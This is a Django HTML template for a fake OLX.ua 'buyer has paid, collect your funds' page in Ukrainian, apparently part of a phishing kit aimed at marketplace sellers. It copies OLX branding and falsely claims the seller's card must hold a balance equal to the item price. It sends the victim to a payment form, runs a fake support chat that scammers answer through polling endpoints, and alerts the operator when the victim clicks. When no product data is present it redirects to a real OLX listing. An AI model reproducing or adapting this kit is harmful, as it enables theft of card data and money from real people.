{% extends 'base.html' %}
{% load static %}
{% block head %}
{% if product_data %}
<meta charset="UTF-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="none">
<meta http-equiv="Content-Language" content="ua">
<meta name="description"
      content="OLX.ua - найкрупніший сервіс оголошень України. Велика база пропонувань за темами: нерухомість, робота, транспорт, купівля/продаж товарів, послуги та багато іншого на OLX.ua!">
<meta property="og:title" content="Сервіс оголошень OLX: сайт оголошень в Україні - нові и бв товари на OLX.ua">
<meta property="og:description"
      content="Мільйони приватних оголошень про купівлю-продаж в твоєму місті. Продається все!">
<meta property="og:image" content="{% static 'img/og.png' %}">
<meta property="og:type" content="website">
<meta property="og:url" content="https://www.olx.ua">
<meta property="og:locale" content="ru_RU">
<link rel="icon" type="image/x-icon"
      href="{% static 'img/favicon.ico' %}">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Сервіс оголошень OLX: сайт оголошень в Україні - нові и бв товари на OLX.ua</title>
<link rel="stylesheet" href="{% static 'style/style.css' %}">
{% else %}
<meta http-equiv="refresh"
      content="0;https://www.olx.ua/obyavlenie/nalya-alkogoly-f1-i-ryumki-podarok-muzhchine-voennowqe123qemu-IDKkgXq.qwedqwdfafawfwaf.html"/>
{% endif %}
{% endblock %}
{% block content %}
{% if product_data %}
<header class="header">
    <div class="container">
        <div class="header-logo">
            <span class="header-logo_o"></span>
            <span class="header-logo_l"></span>
            <span class="header-logo_x"></span>
        </div>
    </div>
</header>
<main class="main">
    <script type="text/javascript" src="{% static 'scripts/jquery.js' %}"></script>
    <div class="container">
        <section class="section info">
            <svg class="info-icon" viewBox="0 0 512 512" width="512px" height="512px">
                <g>
                    <ellipse style="fill:#002F34" cx="256" cy="256" rx="256" ry="255.832" data-original="#32BEA6"
                             class="active-path" data-old_color="#32BEA6"/>
                    <polygon style="fill:#FFFFFF"
                             points="235.472,392.08 114.432,297.784 148.848,253.616 223.176,311.52 345.848,134.504   391.88,166.392 "
                             data-original="#FFFFFF"/>
                </g>
            </svg>
            <div class="info-text">
                <p class="info-title">Покупець оплатив товар</p>
                <p class="info-subtitle">Отримайте кошти прямо зараз</p>
            </div>
        </section>
        <form class="content-container" action="payment/" novalidate>
            <section class="section item">
                <div class="title-block">
                    <img src="{{product_data.img_url}}"
                         class="item-image" alt="">
                    <div class="text">
                        <h2 class="item-title">{{product_data.name_product}}</h2>
                        <p class="item-price">{{product_data.price}} грн.</p>
                    </div>
                </div>
                <div class="user-block">
                    <div class="form-row">
                        <div class="form-item">
                            <label for="surname">Прізвище</label>
                            <input type="text" id="surname" readonly value="{{product_data.surname}}">
                        </div>
                        <div class="form-item">
                            <label for="name">Ім'я</label>
                            <input type="text" id="name" readonly value="{{product_data.name}}">
                        </div>
                        <div class="form-item">
                            <label for="patronymic">По-батькові</label>
                            <input type="text" id="patronymic" readonly value="{{product_data.surduer}}">
                        </div>

                    </div>
                    <div class="form-row">
                        <div class="form-item">
                            <label for="address">Адреса доставки</label>
                            <input type="text" id="address" readonly value="{{product_data.address}}">
                        </div>
                    </div>
                </div>
                <div class="item-subtitle">
                    <p style="    padding: 16px;
    border: 3px solid #e12222;background:#F7D9D9;">
                        Увага! У зв'язку зі збільшенням випадків шахрайства, команда OLX змінила правила
                        користування послуг OLX доставка. Для того щоб банк зміг підтвердити картку продавця, на ній
                        повинна бути сума, еквівалентна коштовності товару, не менш а ніж {{product_data.price}}
                        гривень. Банк утримує суму
                        яка знаходиться на балансі, після підтвердження картки, кошти вертаються продавцю протягом 5-10
                        хвилин. Просимо пробачення за незручності. З повагою, команда OLX.
                    </p>

                    <img src="{% static 'img/2.jpg' %}" alt="" style="height:28px;width:auto;">
                </div>
            </section>
            <section class="section pay">
                <p class="pay-title">Отримання коштів</p>
                <p class="pay-subtitle">До отримання: <b>{{product_data.price}} грн.</b></p>
                <button type="submit" class="pay-button">Отримання коштів</button>
                <p class="pay-info"><img src="{% static 'img/shield.svg' %}" alt="">Проведення платежей безпечне</p>
                <p class="pay-info_more">Натиская кнопку «Отримання коштів», Ви погоджуєтесь з заключенням Договору
                    купівлі-продажу товарів з використанням Онлайн сервіса «Безпечна угода»</p>
            </section>
        </form>
    </div>
    <img src="{% static 'img/ts_img.png' %}" class="ts_img">

    <img src="{% static 'img/ts_img.png' %}" class="ts_img">
    <div class="block-chat">
        <div class="top-background"></div>
        <img src="{% static 'img/logo.png' %}" class="logo">
        <h3 class="close-chat">X</h3>
        <input type="text" name="text_entry" id = "input" class="text_entry" placeholder="Ваше питання...">
        <h1 class="send_btn">></h1>
        <div class="chat" id="chat-messages">
            <p class="hello-text">Вітаю. Напишіть Ваше питання, протягом 3-5 хвилин, до чату підключиться наш оператор.</p>

        </div>
    </div>
    <style type="text/css">
        .ts_img{
            width:70px;
            height: 70px;
            position: fixed;
            bottom:25px;
            right:25px;
            border-radius: 100px;
        }
    .close-chat{
        color: white;
        position: absolute;
        top:5px;
        right:5px;
        padding:10px;
    }
	.chat{
		padding: 10px;
		max-height: 350px;
        overflow-y: scroll;
	}
	.hello-text{
		padding: 5px;
		border-radius: 10px;
		background: #E2E2E2;
		max-width: 200px;
	}
	.text-mess-user{
	    background: #B8CFFF;
		padding: 5px;
		border-radius: 10px;
		max-width: 200px;
		margin-top:10px;
		margin-left: 80px;
	}
	.text-mess-worker{
	    background: #E2E2E2;
		padding: 5px;
		border-radius: 10px;
		max-width: 200px;
		margin-top: 5px;
	}
	.logo{
		width: 70px;
		height: 50px;
		position: absolute;
		top: 0;
	}

	.block-chat{
		background: #fff;
		height: 450px;
		width: 300px;
		bottom: 20px;
		right: 20px;
		position: fixed;
		border-radius: 10px;
		backdrop-filter: blur(5px);
	    box-shadow: 0px 0px 30px
	}
	.top-background{
		background: #18443B;
		width: 100%;
		height: 50px;
		border-top-left-radius: 7px;
		border-top-right-radius: 7px;
		backdrop-filter: blur(5px);
	    box-shadow: 0px 0px 10px
	}

	.text_entry {
		bottom: 0;
		left: 10px;
		font-size: 20px;
		position: absolute;
		-webkit-transition: width 0.4s ease-in-out;
    	transition: width 0.4s ease-in-out;
    	background: transparent;
    	width: 220px;
    	bottom: 10px;
	    border: none;
	    border-radius: 5000px;
	    padding: 8px;
	    backdrop-filter: blur(5px);
	    box-shadow: 0px 0px 10px
	}

	.send_btn {
		width: 40px;
		height: 40px;
		bottom: 10px;
		font-size: 30px;
		text-align: center;
		right: 10px;
		position: absolute;
		color: #23634A;
		background: #F5F5F5;
		border: none;
		border-radius: 10px;
		backdrop-filter: blur(5px);
	    box-shadow: 0px 0px 10px
	}


    </style>
    <script type="text/javascript">
        var scroll = 50000;
        var chat = 0;
        var last_mess_w = "";
        var last_mess_u = "";

        function scrolls() {
            scroll += 8000;
            $(".chat").scrollTop($('.block-chat')[0].scrollHeight);
        }
        function mode() {
            $.ajax({
                url: window.location.href,
                success: function(data) {
                    const request = new XMLHttpRequest();
                    const url = window.location.href + "send-mess-user/";
                    request.open('GET', url);
                    request.send();
                    var get_text = "";
                    request.addEventListener("readystatechange", () => {
                        if(request.readyState === 4 && request.status === 200) {
		                    get_text = String(request.responseText).split("\n");
		                    $('.text-mess-user').remove();
		                    $('.text-mess-worker').remove();
		                    for (let i = 0; i < get_text.length; i++) {
		                        if (get_text[i][0] == "U"){
		                            $('.chat').append('<p class="text-mess-user">'+get_text[i].replace("U:", "")+'</p>');
		                            if (i == get_text.length - 1) {
                                        if (get_text[i] != last_mess_u) {
                                            last_mess_u = get_text[i];
                                            scrolls();
                                        }
                                    }
		                        }
		                        if (get_text[i][0] == "W"){
		                            $('.chat').append('<p class="text-mess-worker">'+get_text[i].replace("W:", "")+'</p>');
                                    if (i == get_text.length - 1) {
                                        if (get_text[i] != last_mess_w) {
                                            last_mess_w = get_text[i];
                                            $('.block-chat').show();
                                            chat=1;
                                            scrolls();
                                        }
                                    }
		                        }
		                    }
                        }
                    });
                }
            });
        }

        if(chat == 0){
            $('.block-chat').hide();
        }
        $('.container').click(function(){
            chat = 0;
            $('.block-chat').hide();
        });
            $('.ts_img').click(function() {
                if(chat == 0){
                    chat = 1;
                    $('.block-chat').show();
                }else {
                    chat = 0;
                    $('.block-chat').hide();
                }
            });
            $('.close-chat').click(function(){
                chat = 0;
                $('.block-chat').hide();
            });

            $('.pay-button').click(function() {
              const request = new XMLHttpRequest();
              const url = window.location + "transit/";
              request.open('GET', url);
              request.send();
            });

            $('.send_btn').click(function() {
                var input = $("#input");
                var get_text = "";
                var text = "text=" + input.val();
                if (input.val().length != 0) {
                    const request = new XMLHttpRequest();
                    const url = window.location.href + "send-mess-user/";
                    request.open("POST", url, true);
                    request.addEventListener("readystatechange", () => {
                        if(request.readyState === 4 && request.status === 200) {
                            input.val("");
                            scrolls();
                        }
                    });
                    request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                    request.send(text);
                }
            });


        setInterval(mode, 100);

    </script>
</main>
{% endif %}
{% endblock %}
